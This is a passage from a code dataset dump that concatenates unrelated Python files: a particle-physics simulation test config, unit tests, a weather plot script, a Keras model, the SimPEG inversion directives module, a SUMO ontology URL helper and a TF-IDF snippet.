[CfgGetter.getPrivateTool(\"CaloEntryLayerTestTool\", checkType=True)] 
\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"MuonEntryLayerTestTool\", checkType=True)] \njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"MuonExitLayerTestTool\", checkType=True)] \njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"PixelHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"SCT_HitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"TrtHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"EMBHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"EMECHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"FCALHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"HECHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"TileHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools[\"TileHitsTestTool\"].TestMBTS=True\n#job.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"MDTHitsTestTool\", checkType=True)]\n#job.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"RPCHitsTestTool\", checkType=True)]\n#job.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"CSCHitsTestTool\", checkType=True)]\n#job.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"TGCHitsTestTool\", checkType=True)]\n\n\n#job += AtlasTestAlg()\n\n# Control random number seeds so that daily runs are identical\nfrom G4AtlasAlg.G4AtlasAlgConf import G4AtlasAlg\ng4AtlasAlg = G4AtlasAlg()\ng4AtlasAlg.RandomGenerator = \"athena\"\nfrom AthenaCommon.AppMgr import ServiceMgr\nfrom AthenaServices.AthenaServicesConf import AtRndmGenSvc\natRndmGenSvc = AtRndmGenSvc()\natRndmGenSvc.Seeds += [\"AtlasG4 1234 5678\"]\natRndmGenSvc.Seeds += [\"SINGLE 2345 6789\"]\natRndmGenSvc.OutputLevel = WARNING\nServiceMgr += atRndmGenSvc\n\n## For saving seeds\n#from G4AtlasApps import AtlasG4Eng\n#pp = AtlasG4Eng.G4Eng.menu_G4RandomNrMenu()\n#pp.set_SaveOn()\n\n## Check of memory during the RTT tests\nfrom G4AtlasApps.atlas_utilities import MemorySnooper\njob += MemorySnooper()\n \nprintfunc (\"###MYOUTPUT###\" )\nprintfunc (ServiceMgr )\nprintfunc (\"###MYOUTPUT###\" )\nprintfunc (job )\n \nfrom AthenaCommon.ConfigurationShelve import saveToAscii \nsaveToAscii(\"config.txt\") \n","sub_path":"Simulation/G4Atlas/G4AtlasTests/share/test_AtlasG4_ParticleGun_pions.py","file_name":"test_AtlasG4_ParticleGun_pions.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"220964591","text":"import unittest\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nfrom mlpipe.test.helpers import data as helper_data\nfrom mlpipe.processors.interpolation import Interpolation\nfrom mlpipe.processors.standard_data_format import StandardDataFormat\n\n\nclass TestInterpolation(unittest.TestCase):\n def test_standardcase(self):\n data = np.array([\n [13, 20],\n [14, 21],\n [np.nan, 22],\n [16, np.nan],\n [17, np.nan],\n [np.nan, np.nan],\n [19, np.nan],\n [20, 27],\n ], dtype=\"float\")\n data.flags.writeable = False\n\n result_expected = np.array([\n [13, 20],\n [14, 21],\n [15, 22],\n [16, 23],\n [17, 24],\n [18, 25],\n [19, np.nan],\n [20, 27],\n ], dtype=\"float\")\n result_expected.flags.writeable = False\n\n result = Interpolation(max_consecutive_interpolated_value=3)._process2d(\n StandardDataFormat(labels=['a', 'b'], data=data, 
timestamps=helper_data.generate_timestamps(samples=8))\n )\n assert_array_equal(result_expected, result.data)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"mlpipe/test/processors/test_interpolation.py","file_name":"test_interpolation.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"133556334","text":"# Data visualization\n# Load the data\nfrom matplotlib import pyplot as plt\nimport csv\nfilename = 'F:\learnpy\python编程入门\sitka_weather_07-2014.csv'\n# Open the file\nwith open(filename) as f:\n # read the file\n reader = csv.reader(f)\n # read the first row, i.e. the header row\n head_row = next(reader)\n # without next() the loop below would visit every row; calling next() here makes the loop skip the header row\n # collect the data\n max_t = []\n for ro in reader:\n max_t.append(int(ro[1]))\n# Plotting\n# set the figure size\nfig = plt.figure(dpi=128,figsize=(10,6))\n# pass in the data\nplt.plot(max_t,c='red')\n# chart title\nplt.title('Daily high temperatures, July 2014',fontsize=24)\n# label the x axis\nplt.xlabel('',fontsize=16)\n# label the y axis\nplt.ylabel('Max Temperature',fontsize=16)\n# style the tick marks\nplt.tick_params(axis='both',which='major',labelsize=16)\n# show the chart\nplt.show()","sub_path":"python编程入门/16sitka_weather.py","file_name":"16sitka_weather.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"501783980","text":"from tensorflow import keras\n\nimport numpy as np\nimport tensorflow as tf\n\n\nclass SReFT(keras.Model):\n\n def __init__(self,\n output_dim=4,\n latent_dim=32,\n activation='tanh',\n random_state=None):\n\n super(SReFT, self).__init__()\n\n self.random_state = random_state\n tf.random.set_seed(random_state)\n np.random.seed(random_state)\n\n self.activation = activation\n self.output_dim = int(output_dim)\n self.latent_dim = int(latent_dim)\n self.tracker_tr = keras.metrics.Mean()\n self.tracker_va = keras.metrics.Mean()\n\n self.lnvar_y = tf.Variable(tf.zeros(self.output_dim))\n\n self.model_1 = keras.Sequential([\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(1, activation=tf.nn.relu),])\n # keras.layers.Dense(1, activation=tf.keras.layers.LeakyReLU(alpha=0.1)),])\n\n self.model_y = keras.Sequential([\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(self.output_dim, activation=None),])\n\n return None\n\n def call(self, inputs, training=False):\n (input1, input2) = inputs\n offset = self.model_1(input1, training=training)\n input2 = tf.concat((input2[:, :, :1] + offset, input2[:, :, 1:]), axis=-1)\n y_pred = self.model_y(input2, training=training)\n return y_pred\n\n def train_step(self, batch):\n inputs, y_true = batch\n with tf.GradientTape() as tape:\n y_pred = self(inputs, training=True)\n y_loss = self.compute_negative_log_likelihood(y_true, y_pred)\n objval = tf.reduce_sum(y_loss)\n grads = tape.gradient(objval, self.trainable_weights)\n self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\n self.tracker_tr.update_state(y_loss)\n return {'loss': self.tracker_tr.result(),}\n\n def test_step(self, batch):\n inputs, y_true = batch\n y_pred = self(inputs, training=False)\n y_loss = self.compute_negative_log_likelihood(y_true, y_pred)\n self.tracker_va.update_state(y_loss)\n return {'loss': 
self.tracker_va.result(),}\n\n def compute_negative_log_likelihood(self, y_true, y_pred):\n is_nan = tf.math.is_nan(y_true)\n y_true = tf.where(is_nan, tf.zeros_like(y_true), y_true)\n y_pred = tf.where(is_nan, tf.zeros_like(y_pred), y_pred)\n neg_ll = self.lnvar_y + tf.pow(y_true - y_pred, 2) / tf.exp(self.lnvar_y)\n neg_ll = tf.where(is_nan, tf.zeros_like(neg_ll), neg_ll)\n return tf.reduce_sum(neg_ll, axis=(1, 2))\n\n\n\nclass DummyTransformer():\n\n def __init__(self,):\n return None\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n return X\n\n def inverse_transform(self, X, y=None):\n return X\n\n def fit_transform(self, X, y=None):\n return X\n","sub_path":"sreft.py","file_name":"sreft.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"230134651","text":"\"\"\"\nsource:leetcode\nGiven a string s, find the length of the longest substring without repeating characters.\nExample 1:\nInput: s = \"abcabcbb\"\nOutput: 3\nExplanation: The answer is \"abc\", with the length of 3.\n\"\"\"\ndef longestNonRepeatingSubString(s:str)-> int:\n char_dict={}\n start=0\n max_length=0\n for ind,character in enumerate(s):\n if character in char_dict and start <= char_dict[character]:\n start = char_dict[character]+1\n \n else:\n max_length=max(max_length,ind-start+1)\n char_dict[character]=ind\n \n return max_length\n\n#--- Driver Codee ---#\ns= input(\"Enter string: \").strip()\nprint(longestNonRepeatingSubString(s))","sub_path":"longestNonRepeatingSubstring.py","file_name":"longestNonRepeatingSubstring.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"399976343","text":"from __future__ import print_function\nfrom . 
import Utils\nimport numpy as np\n\nclass InversionDirective(object):\n \"\"\"InversionDirective\"\"\"\n\n debug = False #: Print debugging information\n\n def __init__(self, **kwargs):\n Utils.setKwargs(self, **kwargs)\n\n @property\n def inversion(self):\n \"\"\"This is the inversion of the InversionDirective instance.\"\"\"\n return getattr(self,'_inversion',None)\n @inversion.setter\n def inversion(self, i):\n if getattr(self,'_inversion',None) is not None:\n print('Warning: InversionDirective {0!s} has switched to a new inversion.'.format(self.__name__))\n self._inversion = i\n\n @property\n def invProb(self): return self.inversion.invProb\n @property\n def opt(self): return self.invProb.opt\n @property\n def reg(self): return self.invProb.reg\n @property\n def dmisfit(self): return self.invProb.dmisfit\n @property\n def survey(self): return self.dmisfit.survey\n @property\n def prob(self): return self.dmisfit.prob\n\n def initialize(self):\n pass\n\n def endIter(self):\n pass\n\n def finish(self):\n pass\n\nclass DirectiveList(object):\n\n dList = None #: The list of Directives\n\n def __init__(self, *directives, **kwargs):\n self.dList = []\n for d in directives:\n assert isinstance(d, InversionDirective), 'All directives must be InversionDirectives not {0!s}'.format(d.__name__)\n self.dList.append(d)\n Utils.setKwargs(self, **kwargs)\n\n @property\n def debug(self):\n return getattr(self, '_debug', False)\n @debug.setter\n def debug(self, value):\n for d in self.dList:\n d.debug = value\n self._debug = value\n\n @property\n def inversion(self):\n \"\"\"This is the inversion of the InversionDirective instance.\"\"\"\n return getattr(self,'_inversion',None)\n @inversion.setter\n def inversion(self, i):\n if self.inversion is i: return\n if getattr(self,'_inversion',None) is not None:\n print('Warning: {0!s} has switched to a new inversion.'.format(self.__name__))\n for d in self.dList:\n d.inversion = i\n self._inversion = i\n\n def call(self, ruleType):\n if self.dList is None:\n if self.debug: 'DirectiveList is None, no directives to call!'\n return\n\n directives = ['initialize', 'endIter', 'finish']\n assert ruleType in directives, 'Directive type must be in [\"{0!s}\"]'.format('\", \"'.join(directives))\n for r in self.dList:\n getattr(r, ruleType)()\n\n\nclass BetaEstimate_ByEig(InversionDirective):\n \"\"\"BetaEstimate\"\"\"\n\n beta0 = None #: The initial Beta (regularization parameter)\n beta0_ratio = 1e2 #: estimateBeta0 is used with this ratio\n\n def initialize(self):\n \"\"\"\n The initial beta is calculated by comparing the estimated\n eigenvalues of JtJ and WtW.\n\n To estimate the eigenvector of **A**, we will use one iteration\n of the *Power Method*:\n\n .. math::\n\n \\mathbf{x_1 = A x_0}\n\n Given this (very course) approximation of the eigenvector,\n we can use the *Rayleigh quotient* to approximate the largest eigenvalue.\n\n .. math::\n\n \\lambda_0 = \\\\frac{\\mathbf{x^\\\\top A x}}{\\mathbf{x^\\\\top x}}\n\n We will approximate the largest eigenvalue for both JtJ and WtW, and\n use some ratio of the quotient to estimate beta0.\n\n .. 
math::\n\n \\\\beta_0 = \\gamma \\\\frac{\\mathbf{x^\\\\top J^\\\\top J x}}{\\mathbf{x^\\\\top W^\\\\top W x}}\n\n :rtype: float\n :return: beta0\n \"\"\"\n\n if self.debug: print('Calculating the beta0 parameter.')\n\n m = self.invProb.curModel\n f = self.invProb.getFields(m, store=True, deleteWarmstart=False)\n\n x0 = np.random.rand(*m.shape)\n t = x0.dot(self.dmisfit.eval2Deriv(m,x0,f=f))\n b = x0.dot(self.reg.eval2Deriv(m, v=x0))\n self.beta0 = self.beta0_ratio*(t/b)\n\n self.invProb.beta = self.beta0\n\n\nclass BetaSchedule(InversionDirective):\n \"\"\"BetaSchedule\"\"\"\n\n coolingFactor = 8.\n coolingRate = 3\n\n def endIter(self):\n if self.opt.iter > 0 and self.opt.iter % self.coolingRate == 0:\n if self.debug: print('BetaSchedule is cooling Beta. Iteration: {0:d}'.format(self.opt.iter))\n self.invProb.beta /= self.coolingFactor\n\n\nclass TargetMisfit(InversionDirective):\n\n chifact = 1.\n phi_d_star = None\n\n @property\n def target(self):\n if getattr(self, '_target', None) is None:\n if self.phi_d_star is None:\n self.phi_d_star = 0.5 * self.survey.nD\n self._target = self.chifact * self.phi_d_star # the factor of 0.5 is because we do phid = 0.5*|| dpred - dobs||^2\n return self._target\n @target.setter\n def target(self, val):\n self._target = val\n\n def endIter(self):\n if self.invProb.phi_d < self.target:\n self.opt.stopNextIteration = True\n\n\n\nclass SaveEveryIteration(InversionDirective):\n @property\n def name(self):\n if getattr(self, '_name', None) is None:\n self._name = 'InversionModel'\n return self._name\n @name.setter\n def name(self, value):\n self._name = value\n\n @property\n def fileName(self):\n if getattr(self, '_fileName', None) is None:\n from datetime import datetime\n self._fileName = '{0!s}-{1!s}'.format(self.name, datetime.now().strftime('%Y-%m-%d-%H-%M'))\n return self._fileName\n @fileName.setter\n def fileName(self, value):\n self._fileName = value\n\n\nclass SaveModelEveryIteration(SaveEveryIteration):\n \"\"\"SaveModelEveryIteration\"\"\"\n\n def initialize(self):\n print(\"SimPEG.SaveModelEveryIteration will save your models as: '###-{0!s}.npy'\".format(self.fileName))\n\n def endIter(self):\n np.save('{0:03d}-{1!s}'.format(self.opt.iter, self.fileName), self.opt.xc)\n\n\nclass SaveOutputEveryIteration(SaveEveryIteration):\n \"\"\"SaveModelEveryIteration\"\"\"\n\n def initialize(self):\n print(\"SimPEG.SaveOutputEveryIteration will save your inversion progress as: '###-{0!s}.txt'\".format(self.fileName))\n f = open(self.fileName+'.txt', 'w')\n f.write(\" # beta phi_d phi_m f\\n\")\n f.close()\n\n def endIter(self):\n f = open(self.fileName+'.txt', 'a')\n f.write(' {0:3d} {1:1.4e} {2:1.4e} {3:1.4e} {4:1.4e}\\n'.format(self.opt.iter, self.invProb.beta, self.invProb.phi_d, self.invProb.phi_m, self.opt.f))\n f.close()\n\n\nclass SaveOutputDictEveryIteration(SaveEveryIteration):\n \"\"\"\n Saves inversion parameters at every iteraion.\n\n\n \"\"\"\n\n def initialize(self):\n print(\"SimPEG.SaveOutputDictEveryIteration will save your inversion progress as dictionary: '###-{0!s}.npz'\".format(self.fileName))\n\n def endIter(self):\n\n # Initialize the output dict\n outDict = {}\n # Save the data.\n outDict['iter'] = self.opt.iter\n outDict['beta'] = self.invProb.beta\n outDict['phi_d'] = self.invProb.phi_d\n outDict['phi_m'] = self.invProb.phi_m\n outDict['phi_ms'] = self.reg._evalSmall(self.invProb.curModel)\n outDict['phi_mx'] = self.reg._evalSmoothx(self.invProb.curModel)\n outDict['phi_my'] = self.reg._evalSmoothy(self.invProb.curModel) if 
self.prob.mesh.dim >= 2 else 'NaN'\n outDict['phi_mz'] = self.reg._evalSmoothz(self.invProb.curModel) if self.prob.mesh.dim==3 else 'NaN'\n outDict['f'] = self.opt.f\n outDict['m'] = self.invProb.curModel\n outDict['dpred'] = self.invProb.dpred\n\n # Save the file as a npz\n np.savez('{:03d}-{:s}'.format(self.opt.iter,self.fileName), outDict)\n\n\nclass Update_IRLS(InversionDirective):\n\n eps_min = None\n eps = None\n norms = [2.,2.,2.,2.]\n factor = None\n gamma = None\n phi_m_last = None\n phi_d_last = None\n f_old = None\n f_min_change = 1e-2\n beta_tol = 5e-2\n prctile = 95\n\n # Solving parameter for IRLS (mode:2)\n IRLSiter = 0\n minGNiter = 5\n maxIRLSiter = 10\n iterStart = 0\n\n # Beta schedule\n coolingFactor = 2.\n coolingRate = 1\n\n mode = 1\n\n @property\n def target(self):\n if getattr(self, '_target', None) is None:\n self._target = self.survey.nD*0.5\n return self._target\n @target.setter\n def target(self, val):\n self._target = val\n\n def initialize(self):\n\n if self.mode == 1:\n self.reg.norms = [2., 2., 2., 2.]\n\n def endIter(self):\n\n # After reaching target misfit with l2-norm, switch to IRLS (mode:2)\n if self.invProb.phi_d < self.target and self.mode == 1:\n print(\"Convergence with smooth l2-norm regularization: Start IRLS steps...\")\n\n self.mode = 2\n\n # Either use the supplied epsilon, or fix base on distribution of\n # model values\n if getattr(self, 'eps', None) is None:\n self.reg.eps_p = np.percentile(np.abs(self.invProb.curModel),self.prctile)\n else:\n self.reg.eps_p = self.eps[0]\n\n if getattr(self, 'eps', None) is None:\n\n self.reg.eps_q = np.percentile(np.abs(self.reg.regmesh.cellDiffxStencil*(self.reg.mapping * self.invProb.curModel)),self.prctile)\n else:\n self.reg.eps_q = self.eps[1]\n\n self.reg.norms = self.norms\n self.coolingFactor = 1.\n self.coolingRate = 1\n self.iterStart = self.opt.iter\n self.phi_d_last = self.invProb.phi_d\n self.phi_m_last = self.invProb.phi_m_last\n\n self.reg.l2model = self.invProb.curModel\n self.reg.curModel = self.invProb.curModel\n\n print(\"L[p qx qy qz]-norm : \" + str(self.reg.norms))\n print(\"eps_p: \" + str(self.reg.eps_p) + \" eps_q: \" + str(self.reg.eps_q))\n\n if getattr(self, 'f_old', None) is None:\n self.f_old = self.reg.eval(self.invProb.curModel)#self.invProb.evalFunction(self.invProb.curModel, return_g=False, return_H=False)\n\n # Beta Schedule\n if self.opt.iter > 0 and self.opt.iter % self.coolingRate == 0:\n if self.debug: print('BetaSchedule is cooling Beta. Iteration: {0:d}'.format(self.opt.iter))\n self.invProb.beta /= self.coolingFactor\n\n\n # Only update after GN iterations\n if (self.opt.iter-self.iterStart) % self.minGNiter == 0 and self.mode==2:\n\n self.IRLSiter += 1\n\n phim_new = self.reg.eval(self.invProb.curModel)\n self.f_change = np.abs(self.f_old - phim_new) / self.f_old\n\n print(\"Regularization decrease: {0:6.3e}\".format((self.f_change)))\n\n # Check for maximum number of IRLS cycles\n if self.IRLSiter == self.maxIRLSiter:\n print(\"Reach maximum number of IRLS cycles: {0:d}\".format(self.maxIRLSiter))\n self.opt.stopNextIteration = True\n return\n\n # Check if the function has changed enough\n if self.f_change < self.f_min_change and self.IRLSiter > 1:\n print(\"Minimum decrease in regularization. 
End of IRLS\")\n self.opt.stopNextIteration = True\n return\n else:\n self.f_old = phim_new\n\n# # Cool the threshold parameter if required\n# if getattr(self, 'factor', None) is not None:\n# eps = self.reg.eps / self.factor\n#\n# if getattr(self, 'eps_min', None) is not None:\n# self.reg.eps = np.max([self.eps_min,eps])\n# else:\n# self.reg.eps = eps\n\n # Get phi_m at the end of current iteration\n self.phi_m_last = self.invProb.phi_m_last\n\n # Reset the regularization matrices so that it is\n # recalculated for current model\n self.reg._Wsmall = None\n self.reg._Wx = None\n self.reg._Wy = None\n self.reg._Wz = None\n\n # Update the model used for the IRLS weights\n self.reg.curModel = self.invProb.curModel\n\n # Temporarely set gamma to 1. to get raw phi_m\n self.reg.gamma = 1.\n\n # Compute new model objective function value\n phim_new = self.reg.eval(self.invProb.curModel)\n\n # Update gamma to scale the regularization between IRLS iterations\n self.reg.gamma = self.phi_m_last / phim_new\n\n # Reset the regularization matrices again for new gamma\n self.reg._Wsmall = None\n self.reg._Wx = None\n self.reg._Wy = None\n self.reg._Wz = None\n\n # Check if misfit is within the tolerance, otherwise scale beta\n val = self.invProb.phi_d / (self.survey.nD*0.5)\n\n if np.abs(1.-val) > self.beta_tol:\n self.invProb.beta = self.invProb.beta * self.survey.nD*0.5 / self.invProb.phi_d\n\nclass Update_lin_PreCond(InversionDirective):\n \"\"\"\n Create a Jacobi preconditioner for the linear problem\n \"\"\"\n onlyOnStart=False\n\n def initialize(self):\n\n if getattr(self.opt, 'approxHinv', None) is None:\n # Update the pre-conditioner\n diagA = np.sum(self.prob.G**2.,axis=0) + self.invProb.beta*(self.reg.W.T*self.reg.W).diagonal() #* (self.reg.mapping * np.ones(self.reg.curModel.size))**2.\n PC = Utils.sdiag((self.prob.mapping.deriv(None).T *diagA)**-1.)\n self.opt.approxHinv = PC\n\n def endIter(self):\n # Cool the threshold parameter\n if self.onlyOnStart==True:\n return\n\n if getattr(self.opt, 'approxHinv', None) is not None:\n # Update the pre-conditioner\n diagA = np.sum(self.prob.G**2.,axis=0) + self.invProb.beta*(self.reg.W.T*self.reg.W).diagonal() #* (self.reg.mapping * np.ones(self.reg.curModel.size))**2.\n PC = Utils.sdiag((self.prob.mapping.deriv(None).T *diagA)**-1.)\n self.opt.approxHinv = PC\n\n\nclass Update_Wj(InversionDirective):\n \"\"\"\n Create approx-sensitivity base weighting using the probing method\n \"\"\"\n k = None # Number of probing cycles\n itr = None # Iteration number to update Wj, or always update if None\n\n def endIter(self):\n\n if self.itr is None or self.itr == self.opt.iter:\n\n m = self.invProb.curModel\n if self.k is None:\n self.k = int(self.survey.nD/10)\n\n def JtJv(v):\n\n Jv = self.prob.Jvec(m, v)\n\n return self.prob.Jtvec(m,Jv)\n\n JtJdiag = Utils.diagEst(JtJv,len(m),k=self.k)\n JtJdiag = JtJdiag / max(JtJdiag)\n\n self.reg.wght = JtJdiag\n","sub_path":"SimPEG/Directives.py","file_name":"Directives.py","file_ext":"py","file_size_in_byte":14842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"391742462","text":"from xmlrpc.client import Server, ServerProxy\nimport requests\nimport bs4\n\nSUMO_TERM = \"http://54.183.42.206:8080/sigma/Browse.jsp?flang=SUO-KIF&lang=EnglishLanguage&kb=SUMO&term\" \\\n \"={term}\"\n\nTERM_SUBCLASS = \"http://54.183.42.206:8080/sigma/Intersect.jsp?kb=SUMO&lang=EnglishLanguage&term1={term}&term2\" \\\n \"=subclass&submit=submit\"\n\ndef get(term): return 
requests.get(\"http://54.183.42.206:8080/sigma/Browse.jsp?flang=SUO-KIF&lang=EnglishLanguage&kb\"\n \"=SUMO&term={term}\".format(term=term))\n\ndef stringify(html): return list(bs4.BeautifulSoup(html).strings)\n\n\ndef _get(term): return requests.get(\"http://54.183.42.206:8080/sigma/Intersect.jsp?kb=SUMO&lang=EnglishLanguage&term1\"\n \"={term}&term2=instance&submit=submit\".format(term=term))\n\n\n\n\n\nSYN = \"{site}{jsp}\" + \"?\" + \"synset={offset}&kb={kb}&flang={flang}&lang={lang}&kb={kb}\".format(\n\tsite = 'http://54.183.42.206:8080/sigma/',\n\tjsp = 'WordNet.jsp', offset='107493527',\n\tkb='SUMO', lang='EnglishLanguage',\n\tflang='SUO-KIF')\n\nEmotionalState = \"{site}{jsp}\"+ \"?\"+ \"flang={flang}&lang={lang}&kb={kb}&term={term}\".format(\n\tsite='http://54.183.42.206:8080/sigma/',\n\tflang='SUO-KIF',\n\tjsp ='Browse.jsp',\n\tterm='EmotionalState',\n\tlang='EnglishLanguage',\n\tkb='SUMO')\n\n\n\nES1 = \"{site}{jsp}\"+\"?\"+\"term={term}&lang={lang}&flang={flang}&kb={kb}&start=25&arg=2&type=arg\".format(\n\tsite='http://54.183.42.206:8080/sigma/', jsp ='BrowseExtra.jsp',\n\tflang='SUO-KIF', term='EmotionalState',lang='EnglishLanguage',\n\tkb='SUMO')\n\nOrgan_subclass = \"{site}{jsp}\"+\"?\"+\"kb={kb}&lang={lang}&flang={flang}&term1={term1}\".format(\n\tsite='http://54.183.42.206:8080/sigma/', jsp ='Intersect.jsp',\n\tkb='SUMO', lang='EnglishLanguage', flang='SUO-KIF', term1='Organ')\n\nOrgan_doc = \"{site}{jsp}\"+\"?\"+\"kb={kb}&lang={lang}&term1={term1}&term2={term2}&submit=submit\".format(\n\tsite='http://54.183.42.206:8080/sigma/', kb='SUMO', jsp='Intersect.jsp',\n\tlang='EnglishLanguage', term1='Organ', term2='documentation')\n\nES_domain = \"{site}{jsp}\"+ \"?\" + \"kb={kb}&lang={lang}&term1={term1}&term2={term2}&submit=submit\".format(\n\tsite='http://54.183.42.206:8080/sigma/', kb='SUMO', jsp='Intersect.jsp',\n\tlang='EnglishLanguage', term1='EmotionalState', term2='domain')\n\nSAA_disjoint = \"{site}{jsp}\"+ \"?\"+ \"kb={kb}&lang={lang}&term1={term1} &term2={term2}&submit=submit\".format(\n\tsite='http://54.183.42.206:8080/sigma/', jsp='Intersect.jsp',\n\tkb='SUMO', lang='EnglishLanguage',\n\tterm1='SubjectiveAssessmentAttribute', term2='disjoint')\n\nWN_ES = \"{site}{jsp}\"+ \"?\" + \"kb={kb}&term=WN30-{offset}\".format(\n\tsite='http://54.183.42.206:8080/sigma/', jsp='OWL.jsp',\n\toffset='107493527', kb='SUMO')\n","sub_path":"SUMO/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"563612907","text":"# -*- coding: utf-8 -*-\nfrom copy import deepcopy\nfrom unittest import TestCase\n\nfrom ship.exceptions import DuplicateError, NotFoundException\nfrom ship.storage import ShipDjangoStorage, ShipPureMemoryStorage\nfrom ship.logic import ShipLogic\n\n\nclass ShipLogicInterface:\n\n maxDiff = None\n\n ship_data = {\n 'name': 'GOODSHIP COTTON',\n 'imo_number': '1234567',\n 'user_id': 1,\n 'notes': None,\n }\n\n def tearDown(self):\n self.logic.storage.wipe()\n\n def test_create_ship(self):\n data = deepcopy(self.ship_data)\n actual = self.logic.create_ship(**data)\n\n self.assertTrue('id' in actual)\n del actual['id']\n\n self.assertTrue('created' in actual)\n del actual['created']\n\n self.assertTrue('modified' in actual)\n del actual['modified']\n\n self.assertEqual(actual['status'], 'ACTIVE')\n del actual['status']\n\n self.assertEqual(actual, self.ship_data)\n\n def test_create_ship_raises_duplicate_error(self):\n data = 
deepcopy(self.ship_data)\n self.logic.create_ship(**data)\n\n with self.assertRaises(DuplicateError):\n self.logic.create_ship(**data)\n\n def test_get_ships(self):\n data = deepcopy(self.ship_data)\n\n expected = self.logic.create_ship(**data)\n\n # We will create 10 additional ships that we don't expect to see\n # when we retrieve the ships by user_id later on.\n for index in range(9):\n data['imo_number'] = '765432{index}'.format(index=index)\n self.logic.create_ship(**data)\n\n # Create a ship for a different user that won't be returned when\n # retrieving ships\n data['user_id'] = 666\n self.logic.create_ship(**data)\n\n ships, total_count = self.logic.get_ships(\n user_ids=[self.ship_data['user_id']],\n order_by='-created',\n )\n\n self.assertEqual(total_count, 10)\n self.assertEqual(len(ships), 10)\n self.assertEqual(ships[0], expected)\n\n def test_update_ship(self):\n data = deepcopy(self.ship_data)\n ship = self.logic.create_ship(**data)\n\n expected = self.logic.update_ship(\n id=ship['id'],\n notes='Here are some fun notes',\n )\n\n ships, count = self.logic.get_ships(\n id=ship['id'],\n )\n self.assertEqual(count, 1)\n self.assertEqual(ships[0]['notes'], expected['notes'])\n\n def test_update_non_existent_ship_raises_not_found_exception(self):\n with self.assertRaises(NotFoundException):\n self.logic.update_ship(\n id=1234567889999,\n notes='Not found bud!'\n )\n\n def test_update_ship_user_id(self):\n data = deepcopy(self.ship_data)\n expected = self.logic.create_ship(**data)\n\n actual = self.logic.update_ship(\n id=expected['id'],\n user_id=1234,\n )\n\n self.assertEqual(actual['user_id'], expected['user_id'])\n\n def test_delete_ship(self):\n data = deepcopy(self.ship_data)\n ship = self.logic.create_ship(**data)\n\n actual = self.logic.delete_ship(ship['id'])\n self.assertEqual(actual['status'], 'DELETED')\n\n ships, count = self.logic.get_ships(id=ship['id'])\n self.assertEqual(count, 1)\n self.assertEqual(ships[0]['status'], 'DELETED')\n\n\nclass TestShipLogic_PureMemoryStorage(ShipLogicInterface, TestCase):\n\n storage = ShipPureMemoryStorage()\n logic = ShipLogic(storage)\n\n\nclass TestShipLogic_DjangoStorage(ShipLogicInterface, TestCase):\n\n storage = ShipDjangoStorage()\n logic = ShipLogic(storage)\n\n","sub_path":"ship/tests/test_ship_logic.py","file_name":"test_ship_logic.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"96450411","text":"__author__ = 'nicolasambin'\n\nimport unicodecsv\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\n# we train the vectorizer on the whole corpus\ncorpus = []\nwith open('data/data_ateco.csv', 'r') as rf:\n reader = unicodecsv.DictReader(rf)\n for line in reader:\n terms_meta = ','.join(line['tf_meta_description'].split(';')) if line['tf_meta_description'] else ''\n terms_descr = ','.join(line['tf_description_page'].split(';')) if line['tf_description_page'] else ''\n if terms_meta + terms_descr:\n corpus.append(terms_meta + terms_descr)\n\nvectorizer = TfidfVectorizer()\nm = vectorizer.fit(corpus)\n\n\ndef tfidf_normalize(wordslist):\n\n t = m.transform([' '.join(wordslist)])\n t_array = t.toarray()[0]\n\n names = m.get_feature_names()\n normalized_text = {}\n for i in set(wordslist):\n if i in names:\n normalized_text[i] = t_array[names.index(i)]\n else:\n normalized_text[i] = 1\n\n return 
